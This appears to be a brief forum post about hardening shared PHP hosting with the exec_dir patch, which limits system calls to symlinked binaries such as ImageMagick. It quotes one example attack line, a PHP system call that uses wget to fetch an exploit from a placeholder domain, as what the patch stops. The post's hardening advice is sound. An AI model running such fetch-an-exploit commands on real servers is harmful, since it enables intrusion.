Pretty Cool Php Patch exec_dir

http://kyberdigi.cz/projects/execdir/english.html

I never really looked at it until recently, it was on the backburner so to say. Alot of hosts disable exec, system, shell_exec, etc. This however breaks some scripts that need things like imagemagick since it is usually called using one of the system command functions. I started playing around with the patch and its pretty neat.

Patch php
add exec_dir = /usr/local/phpchroot

and then symlink things into that directory for example

ln -s /usr/bin/convert /usr/local/phpchroot/convert (just an example name)

now if people try to run things like

system(wget http://www.domain.com/exploit);

it wont let them because the binary is not in the chroot folder. But if they try to run "convert" which is imagemagick, they can run it.

just something to play around with

 

 

 

 

Top